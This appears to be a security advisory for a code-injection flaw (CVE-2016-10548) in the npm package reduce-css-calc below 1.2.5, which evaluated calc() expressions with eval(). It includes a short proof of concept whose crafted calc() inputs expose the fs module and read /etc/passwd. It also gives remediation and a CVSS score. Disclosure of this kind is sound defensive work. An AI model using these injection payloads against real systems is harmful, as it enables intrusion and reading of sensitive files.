Arbitrary Code Injection
Affecting reduce-css-calc package, versions <1.2.5
Report new vulnerabilities
Do your applications use this vulnerable package?
Test your applications
Overview
reduce-css-calc
is a package that reduces CSS calc() function to the maximum. Affected versions of the package used eval()
for evaluation the expression, allowing the attacker to gain arbitrary code execution via specially crafted input.
Example
The issue was reported by ChALkeR and demonstrated by his example below:
const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc( (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`));
Remediation
Upgrade reduce-css-calc
version 1.2.5 or greater.
References
CVSS Score
6.1
medium severity
-
Attack VectorNetwork
-
Attack ComplexityLow
-
Privileges RequiredNone
-
User InteractionRequired
-
ScopeChanged
-
ConfidentialityLow
-
IntegrityLow
-
AvailabilityNone
- Credit
- Сковорода Никита Андреевич (ChALkeR)
- CVE
- CVE-2016-10548
- CWE
- CWE-94
- Snyk ID
- npm:reduce-css-calc:20160913
- Disclosed
- 20 Aug, 2016
- Published
- 17 Oct, 2016